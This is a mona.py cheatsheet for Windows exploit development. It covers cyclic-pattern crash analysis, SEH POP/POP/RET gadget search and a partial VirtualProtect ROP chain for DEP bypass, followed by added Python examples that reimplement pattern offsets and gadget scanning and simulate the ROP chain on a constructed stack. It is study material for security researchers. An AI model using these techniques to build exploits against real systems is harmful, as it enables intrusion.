Mona cheatsheet

A short list of mona.py commands, useful when starting to play with it :)

===========================
A LITTLE MONA.PY CHEATSHEET
===========================
Last modified: 08/12/2011
Author: luca.mella@studio.unibo.it

*** Configuration ***

!mona config -set workingfolder c:\logs\%p
    Set the working folder; mona writes its output (log files) there.
    Use -get instead of -set to retrieve the current working folder.
    (%p is expanded to the process name.)

-cm <option>=true/false
    Module criteria, i.e. which modules a search may use: safeseh aslr os rebase

*** General searching options ***

-cp <option>,<option>
    Pointer criteria: nonull unicode 00xx00yy ascii asciiprint upper lower
    uppernum lowernum numeric alphanum startswithnull 00xxyyzz
-cpb <badchars>
    Exclude pointers containing the specified bad chars from the pointer search
-p <N>
    Number of pointers to return
-x <level>
    R, W, X, RW, RX, WX, RWX, * : only return pointers that point into a
    segment with the specified access level

*** Pattern ***

!mona pc <size>
    Create a cyclic pattern of <size> bytes (the same pattern as Metasploit's
    pattern_create).
!mona po <0x4bytes>
    Find the offset of the specified 4 bytes (e.g. the value left in EIP) in
    the cyclic pattern.
*** After a crash with a cyclic pattern payload ***

!mona suggest
    Locates the cyclic pattern in memory, checks which registers and stack
    slots hold pattern bytes (or point at them) and writes an exploit
    skeleton (exploit.rb) to the working folder. Watch the output for the
    "Examining registers" lines, e.g.:
        EIP overwritten with normal pattern : 0x37694136 (offset 260)
        ESP (0x0018f574) points at offset 264 in normal pattern (length 736)
        EBP overwritten with normal pattern : 0x69413569 (offset 256)
        EBX (0x0018f580) points at offset 276 in normal pattern (length 724)

    --- output ---
    0BADF00D  [+] Processing arguments and criteria
    0BADF00D      - Pointer access level : X
    0BADF00D  [+] Looking for cyclic pattern in memory
    750F0000  Modules C:\Windows\System32\wshtcpip.dll
    0BADF00D      Cyclic pattern (normal) found at 0x0018f46c (length 1000 bytes)
    0BADF00D      Cyclic pattern (normal) found at 0x001c3961 (length 1000 bytes)
    0BADF00D  [+] Examining registers
    0BADF00D      EIP overwritten with normal pattern : 0x37694136 (offset 260)
    0BADF00D      ESP (0x0018f574) points at offset 264 in normal pattern (length 736)
    0BADF00D      EBP overwritten with normal pattern : 0x69413569 (offset 256)
    0BADF00D      EBX (0x0018f580) points at offset 276 in normal pattern (length 724)
    0BADF00D  [+] Examining SEH chain
    0BADF00D  [+] Examining stack
    0BADF00D      Pointer into normal cyclic pattern at ESP-0x1e8 (-488) : 0x0018f580 : offset 276, length 724
    0BADF00D      Pointer into normal cyclic pattern at ESP-0x19c (-412) : 0x001c396d : offset 12, length 988
    0BADF00D      Pointer into normal cyclic pattern at ESP-0x174 (-372) : 0x0018f46c : offset 0, length 1000
    0BADF00D      Pointer into normal cyclic pattern at ESP-0x170 (-368) : 0x001c396d : offset 12, length 988
    0BADF00D      Pointer into normal cyclic pattern at ESP-0x164 (-356) : 0x0018f580 : offset 276, length 724
    0BADF00D      Pointer into normal cyclic pattern at ESP-0x154 (-340) : 0x0018f56c : offset 256, length 744
    0BADF00D      Pointer into normal cyclic pattern at ESP-0x134 (-308) : 0x0018f580 : offset 276, length 724
    0BADF00D      Pointer into normal cyclic pattern at ESP-0x114 (-276) : 0x0018f46c : offset 0, length 1000
    0BADF00D      Pointer into normal cyclic pattern at ESP-0x110 (-272) : 0x0018f46c : offset 0, length 1000
    0BADF00D      Pointer into normal cyclic pattern at ESP-0x10c (-268) : 0x0018f580 : offset 276, length 724
    0BADF00D  [+] Preparing log file exploit.rb
    0BADF00D      - (Re)setting logfile C:\mona_logs\exploit.rb
    0BADF00D  [+] Generating module info table, hang on...
    0BADF00D      - Processing modules
    0BADF00D      - Done. Let's rock n roll.
    --- end of output ---
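As an added example (not part of the original cheatsheet and not mona.py's own code), the following Python re-implements the cyclic pattern behind !mona pc / !mona po and the "Examining registers" step of !mona suggest, so that the offsets quoted in the output above (EIP -> 260, EBP -> 256, ESP -> 264, EBX -> 276) can be reproduced offline. The register values and the pattern address 0x0018f46c are taken from that output; the memory image is constructed here, not dumped from a process.

```python
# Added example, not code from the cheatsheet or from mona.py: the
# Metasploit-style cyclic pattern that `!mona pc` generates and that
# `!mona po` / `!mona suggest` search for.
import string
import struct

UPPER, LOWER, DIGITS = string.ascii_uppercase, string.ascii_lowercase, string.digits
TRIPLES = len(UPPER) * len(LOWER) * len(DIGITS)   # 6760 distinct 3-byte groups
PERIOD = TRIPLES * 3                                # 20280 bytes before the pattern repeats


def pattern_create(length):
    """Equivalent of `!mona pc <length>`: groups of <Upper><lower><digit>,
    the digit cycling fastest, then the lowercase letter, then the uppercase."""
    out = bytearray()
    i = 0
    while len(out) < length:
        t = i % TRIPLES
        out += (UPPER[t // 260] + LOWER[(t // 10) % 26] + DIGITS[t % 10]).encode()
        i += 1
    return bytes(out[:length])


def pattern_offset(value, length=PERIOD):
    """Equivalent of `!mona po <value>`. `value` is either the 32-bit register
    value as the debugger shows it (little-endian, so 0x37694136 is the bytes
    '6Ai7' in memory) or raw bytes read from memory. Returns -1 when the bytes
    are not part of the pattern."""
    needle = struct.pack("<I", value) if isinstance(value, int) else bytes(value)
    return pattern_create(length).find(needle)


def examine_registers(regs, memory=None, length=PERIOD):
    """Mimic the 'Examining registers' step of `!mona suggest`: a register is
    'overwritten' when its value itself is pattern bytes, and 'points at' when
    it holds an address whose contents are pattern bytes.
    `memory` is a constructed {start_address: bytes} image."""
    report = {}
    for name, value in regs.items():
        off = pattern_offset(value, length)
        if off >= 0:
            report[name] = ("overwritten", off)
            continue
        for start, data in (memory or {}).items():
            if start <= value < start + len(data) - 3:
                off = pattern_offset(data[value - start:value - start + 4], length)
                if off >= 0:
                    report[name] = ("points at", off)
                break
    return report


# Constructed crash state: the register values and the pattern location
# (0x0018f46c, 1000 bytes) reported in the !mona suggest output above.
CRASH_REGS = {"EIP": 0x37694136, "ESP": 0x0018F574, "EBP": 0x69413569, "EBX": 0x0018F580}
CRASH_MEMORY = {0x0018F46C: pattern_create(1000)}

if __name__ == "__main__":
    for reg, (how, off) in examine_registers(CRASH_REGS, CRASH_MEMORY).items():
        print(f"{reg} {how} offset {off} in normal pattern")
```

Note that the value passed to pattern_offset() is the dword as the debugger prints it: the function packs it little-endian before searching, which is why 0x37694136 is found at 260 even though the pattern contains "6Ai7", not "7iA6".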
*** Finding things in memory ***

!mona find
    Find a sequence of bytes in memory.
    Mandatory argument:
        -s <pattern>  : the sequence to search for
    Optional arguments:
        -type <type>  : type of pattern to search for: bin, asc, ptr, instr, file
        -b <address>  : the bottom of the search range
        -t <address>  : the top of the search range
        -c            : skip consecutive pointers but show the length of the pattern instead
        -p2p          : show pointers to pointers to the pattern (might take a while!)
        -r <number>   : if -p2p is used, also find close pointers; the value is the
                        number of bytes to step backwards for each search

!mona find -type instr -s "jmp ebx" -m ntdll.dll
    Search the module ntdll.dll for "jmp ebx" as an assembly instruction.
    --- output ---
    Result: 0x77e5172b (b+0x0007172b) : "jmp ebx" | {PAGE_EXECUTE_READ} [ntdll.dll]
            ASLR: True, Rebase: True, SafeSEH: True, OS: True, v6.1.7600.16385
            (C:\Windows\SysWOW64\ntdll.dll)
    --- end of output ---
    Note that this result would be useless in a real exploit: the module is
    ASLR-enabled and rebased (see the module criteria -cm above).

*** Assemble instructions ***

!mona assemble -s "nop"
    Return the opcodes of the specified instructions (chain several with #).

*** Searching for POP/POP/RET instructions (SEH exploiting) ***

!mona seh
    Find POP POP RET sequences in the process' memory. These are the sequences
    used as the overwritten SEH handler address in SEH-based exploits.
    --- output ---
    0BADF00D  [+] Writing results to C:\mona_logs\seh.txt
    0BADF00D      - Number of pointers of type pop ebx # pop eax # ret : 3
    0BADF00D      - Number of pointers of type pop esi # pop edi # ret : 3
    0BADF00D      - Number of pointers of type pop ecx # pop ebx # ret : 1
    0BADF00D      - Number of pointers of type pop ebx # pop ebp # ret : 3
    0BADF00D      - Number of pointers of type pop ebx # pop eax # ret 04 : 2
    0BADF00D      - Number of pointers of type pop ebx # pop ecx # ret : 15
    0BADF00D      - Number of pointers of type pop ecx # pop edi # ret : 1
    0BADF00D      - Number of pointers of type pop ebx # pop ecx # ret 0c : 1
    0BADF00D      - Number of pointers of type pop esi # pop ebx # ret : 6
    0BADF00D      - Number of pointers of type jmp dword ptr ss:[esp+14] : 1
    0BADF00D      - Number of pointers of type pop esi # pop ebx # ret 08 : 2
    0BADF00D      - Number of pointers of type call dword ptr ss:[ebp-04] : 1
    0BADF00D      - Number of pointers of type pop esi # pop ebx # ret 04 : 2
    0BADF00D      - Number of pointers of type call dword ptr ss:[esp+14] : 1
    0BADF00D      - Number of pointers of type pop ebx # pop ecx # ret 04 : 14
    0BADF00D      - Number of pointers of type call dword ptr ss:[ebp-18] : 1
    0BADF00D      - Number of pointers of type pop edi # pop ebx # ret : 1
    [..]
    --- end of output ---

*** ROP based exploit ***

!mona rop -m <NONASLRMODULES>
    Analyze memory and prepare several lists: valid ROP gadgets (any INSTR + RET
    sequence), stack pivots and ROP functions. Generate a ROP chain aimed at
    bypassing DEP (call to VirtualProtect with the PUSHAD technique) and point
    out which addresses still need to be fixed to make it work.
    NOTE:
        Watch "C:\mona_logs\rop_suggestion.txt" for a clear gadget list.
        Watch "C:\mona_logs\rop_virtualprotect.txt" for a starting point for
        your ROP payload (aimed at DEP bypass).
        Watch "C:\mona_logs\stack_pivot.txt" for a list of gadgets that
        change ESP.
    --- output ---
    ---------- Mona command started on 2011-07-21 10:58:09 ----------
    [..]
    VirtualProtect register structure (PUSHAD technique)
    ----------------------------------------------------
     EAX = NOP (0x90909090)
     ECX = lpOldProtect (Writable ptr)
     EDX = NewProtect (0x40)
     EBX = Size
     ESP = lpAddress (automatic)
     EBP = ReturnTo (ptr to jmp esp - run !mona jmp -r esp -n -o)
     ESI = ptr to VirtualProtect()
     EDI = ROP NOP (RETN)

    VirtualProtect() pushad rop chain
    ------------------------------------
    rop_gadgets = [
        0x00404880,  # POP ECX # RETN (server.exe)
        0x????????,  # <- *&VirtualProtect()
        0x00406a48,  # MOV EAX,DWORD PTR DS:[ECX] # ADD EAX,ECX # RETN (server.exe)
        0x????????,  # ** <- find routine to move VirtualProtect() into esi
                     # ** Hint : look for mov [esp+offset],eax and pop esi
        0x????????,  # couldn't find a pointer to put ptr to jmp esp into ebp
        0x????????,  # <- put pointer to payload here
        0x00403e04,  # POP EBX # RETN (server.exe)
        0x00000201,  # <- change size to mark as executable if needed (-> ebx)
        0x00404880,  # POP ECX # RETN (server.exe)
        0x00409000,  # RW pointer (lpOldProtect) (-> ecx)
        0x00404be4,  # POP EDI # RETN (server.exe)
        0x00404be5,  # ROP NOP (-> edi)
        0x0040431c,  # POP EDX # RETN (server.exe)
        0x00000040,  # newProtect (0x40) (-> edx)
        0x00404a84,  # POP EAX # RETN (server.exe)
        0x90909090,  # NOPS (-> eax)
        0x004022e0,  # PUSHAD # RETN (server.exe)
        # rop chain generated by mona.py
        # note : this chain may not work out of the box
        # you may have to change order or fix some gadgets,
        # but it should give you a head start
    ].pack("V*")
    [..]
    --- end of output ---

======================================================================================
Reference:
    https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/
    https://www.corelan.be/index.php/2011/05/12/hack-notes-ropping-eggs-for-breakfast/
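As an added example for the "Finding things in memory" and "Searching for POP/POP/RET" sections above (my code, not mona.py's), the Python below does at byte level what !mona find -type bin and !mona seh do, and then applies the -cp nonull / -cpb <badchars> pointer criteria to the addresses it finds. The module base 0x10101001 and the bytes in MODULE_IMAGE are constructed for the example; "jmp ebx" is searched as its opcode bytes FF E3, which is what !mona assemble -s "jmp ebx" returns.

```python
# Added example, not mona's own code: a scan over a constructed module image
# for "jmp ebx" and POP/POP/RET sequences, with pointer criteria applied.
import struct

# Single-byte POP r32 opcodes (0x58 + register number) and the two RET forms.
POP_REG = dict(zip(range(0x58, 0x60), ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]))
RET, RET_IMM16 = 0xC3, 0xC2
JMP_EBX = b"\xff\xe3"          # opcode bytes of "jmp ebx"

MODULE_BASE = 0x10101001       # constructed base address without null bytes
MODULE_IMAGE = (
    b"\x90\x90"
    + JMP_EBX                      # offset 2  : jmp ebx
    + b"\x5b\x58\xc3"              # offset 4  : pop ebx # pop eax # ret
    + b"\x90\x90"
    + b"\x5b\x59\xc3"              # offset 9  : pop ebx # pop ecx # ret (address ends in 0x0a)
    + b"\x90\x90"
    + b"\x5e\x5b\xc2\x08\x00"      # offset 14 : pop esi # pop ebx # ret 08
    + b"\x90" * 8
)


def find_bytes(image, base, needle):
    """`!mona find -type bin -s <needle>`: every address at which needle occurs."""
    hits, i = [], image.find(needle)
    while i != -1:
        hits.append(base + i)
        i = image.find(needle, i + 1)
    return hits


def find_pop_pop_ret(image, base):
    """`!mona seh`: POP r32 # POP r32 # RET [imm16] sequences, as (address, text).
    POP ESP is skipped (my choice for this example): it would move the stack
    pointer instead of just discarding two dwords before the RET."""
    hits = []
    for i in range(len(image) - 2):
        a, b, c = image[i], image[i + 1], image[i + 2]
        if a not in POP_REG or b not in POP_REG or 0x5C in (a, b):
            continue
        if c == RET:
            hits.append((base + i, f"pop {POP_REG[a]} # pop {POP_REG[b]} # ret"))
        elif c == RET_IMM16 and i + 4 < len(image):
            imm = struct.unpack_from("<H", image, i + 3)[0]
            hits.append((base + i, f"pop {POP_REG[a]} # pop {POP_REG[b]} # ret {imm:02x}"))
    return hits


def pointer_ok(addr, badchars=b"", nonull=True):
    """-cp nonull and -cpb <badchars>: the pointer is only usable if its
    little-endian encoding contains neither a null nor a bad byte."""
    raw = struct.pack("<I", addr)
    if nonull and 0 in raw:
        return False
    return not any(bc in raw for bc in badchars)


def seh_candidates(image, base, badchars=b""):
    """The list `!mona seh -cpb <badchars>` would leave you with."""
    return [(a, t) for a, t in find_pop_pop_ret(image, base) if pointer_ok(a, badchars)]


if __name__ == "__main__":
    for addr in find_bytes(MODULE_IMAGE, MODULE_BASE, JMP_EBX):
        print(f"0x{addr:08x} : jmp ebx")
    for addr, text in seh_candidates(MODULE_IMAGE, MODULE_BASE, badchars=b"\x0a\x0d"):
        print(f"0x{addr:08x} : {text}")
```

With badchars 0x0a and 0x0d the pop ebx # pop ecx # ret at 0x1010100a is dropped, the same way -cpb would drop it, and any gadget in a module loaded below 0x01000000 (such as the server.exe addresses in the ROP chain above) fails the nonull criterion because its address contains a null byte.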
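As an added example for the ROP section above (my code, not mona.py's and not the chain from the page), the following Python models the PUSHAD technique the generated VirtualProtect chain relies on and runs it over a constructed stack, so you can see why each register must hold exactly what mona's "VirtualProtect register structure" table says. The server.exe gadget addresses the page lists are reused; the POP ESI, POP EBP, "jmp esp" and VirtualProtect addresses are assumed placeholders (the page's chain instead reads VirtualProtect's address through the IAT and leaves those slots as 0x????????), and STACK_BASE is an assumed stack address.

```python
# Added example, not mona's code: a tiny x86 model (POP/RETN/PUSHAD gadgets on
# a byte-array stack) that executes a VirtualProtect PUSHAD chain.
import struct

STACK_BASE = 0x0018F500          # assumed stack address for the model
VIRTUALPROTECT = 0x75F01234      # assumed address of kernel32!VirtualProtect
JMP_ESP = 0x00401111             # assumed "jmp esp" found with !mona jmp -r esp
ROP_NOP = 0x00404BE5             # RETN (server.exe), from the page

# Gadget address -> micro-ops the model understands. server.exe gadgets from the page.
GADGETS = {
    0x00404880: [("pop", "ecx"), ("retn",)],
    0x00403E04: [("pop", "ebx"), ("retn",)],
    0x00404BE4: [("pop", "edi"), ("retn",)],
    0x0040431C: [("pop", "edx"), ("retn",)],
    0x00404A84: [("pop", "eax"), ("retn",)],
    0x004022E0: [("pushad",), ("retn",)],
    ROP_NOP: [("retn",)],
    0x00402EB0: [("pop", "esi"), ("retn",)],     # assumed POP ESI # RETN
    0x00402EC0: [("pop", "ebp"), ("retn",)],     # assumed POP EBP # RETN
    VIRTUALPROTECT: [("virtualprotect",)],      # stdcall, 4 args: RET 0x10
    JMP_ESP: [("jmp_esp",)],
}

# Same plan as mona's chain: load the registers, then PUSHAD # RETN.
CHAIN = [
    0x00402EB0, VIRTUALPROTECT,   # ESI = ptr to VirtualProtect()
    0x00402EC0, JMP_ESP,          # EBP = ReturnTo (jmp esp)
    0x00403E04, 0x00000201,       # EBX = Size
    0x00404880, 0x00409000,       # ECX = lpOldProtect (RW pointer, from the page)
    0x00404BE4, ROP_NOP,          # EDI = ROP NOP
    0x0040431C, 0x00000040,       # EDX = NewProtect (PAGE_EXECUTE_READWRITE)
    0x00404A84, 0x90909090,       # EAX = NOPs
    0x004022E0,                   # PUSHAD # RETN
]
SHELLCODE = b"\xcc" * 8           # constructed stand-in for the real payload


class Cpu:
    def __init__(self, chain, shellcode):
        self.mem = bytearray(0x400)
        blob = b"".join(struct.pack("<I", d) for d in chain) + shellcode
        self.mem[0x100:0x100 + len(blob)] = blob       # chain, then payload
        self.regs = dict.fromkeys("eax ecx edx ebx esp ebp esi edi".split(), 0)
        self.regs["esp"] = STACK_BASE + 0x100           # ESP sits on the chain
        self.vp_args = None

    def rd(self, addr):
        off = addr - STACK_BASE
        if not 0 <= off <= len(self.mem) - 4:
            raise RuntimeError(f"read outside the modelled stack at 0x{addr:08x}")
        return struct.unpack_from("<I", self.mem, off)[0]

    def push(self, v):
        self.regs["esp"] -= 4
        struct.pack_into("<I", self.mem, self.regs["esp"] - STACK_BASE, v)

    def pop(self):
        v = self.rd(self.regs["esp"])
        self.regs["esp"] += 4
        return v

    def run(self):
        eip = self.pop()                                 # first RETN into the chain
        while True:
            if eip not in GADGETS:
                raise RuntimeError(f"EIP=0x{eip:08x} is not a gadget: crash")
            for op in GADGETS[eip]:
                if op[0] == "pop":
                    self.regs[op[1]] = self.pop()
                elif op[0] == "retn":
                    eip = self.pop()
                elif op[0] == "pushad":
                    # Pushes EAX,ECX,EDX,EBX,ESP(original),EBP,ESI,EDI, so the
                    # RETN after it pops EDI (ROP NOP), whose RETN pops ESI.
                    esp0 = self.regs["esp"]
                    for r in ("eax", "ecx", "edx", "ebx"):
                        self.push(self.regs[r])
                    self.push(esp0)
                    for r in ("ebp", "esi", "edi"):
                        self.push(self.regs[r])
                elif op[0] == "virtualprotect":
                    ret = self.pop()                     # saved EBP = jmp esp
                    self.vp_args = tuple(self.pop() for _ in range(4))   # RET 0x10
                    eip = ret
                elif op[0] == "jmp_esp":
                    return self.regs["esp"]              # execution lands on [ESP]


def simulate_chain(chain=CHAIN, shellcode=SHELLCODE):
    """Run the chain; report VirtualProtect's arguments and where jmp esp lands."""
    cpu = Cpu(chain, shellcode)
    landing = cpu.run()
    lp_address, size, new_protect, old_protect_ptr = cpu.vp_args
    return {"lpAddress": lp_address, "dwSize": size, "flNewProtect": new_protect,
            "lpflOldProtect": old_protect_ptr, "landing": landing,
            "bytes_at_landing": bytes(cpu.mem[landing - STACK_BASE:landing - STACK_BASE + 12])}


def chain_runs(chain):
    """True if the chain reaches jmp esp without hitting a non-gadget address."""
    try:
        simulate_chain(chain)
        return True
    except RuntimeError:
        return False


if __name__ == "__main__":
    r = simulate_chain()
    print(f"VirtualProtect(lpAddress=0x{r['lpAddress']:08x}, dwSize=0x{r['dwSize']:x}, "
          f"flNewProtect=0x{r['flNewProtect']:x}, lpflOldProtect=0x{r['lpflOldProtect']:08x})")
    print(f"jmp esp lands at 0x{r['landing']:08x}: {r['bytes_at_landing'].hex()}")
```

The model shows what "ESP = lpAddress (automatic)" means: the ESP value PUSHAD saves is the address right after the PUSHAD gadget in the chain, i.e. the start of the payload, and after VirtualProtect's RET 0x10 the stack pointer rests on the saved EAX (the four NOPs) immediately below it, which is where the jmp esp in EBP sends execution. Dropping the POP EDI step (chain_runs() on CHAIN without entries 8 and 9) makes the RETN after PUSHAD pop EDI = 0 and the run dies, which is the "this chain may not work out of the box" case.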
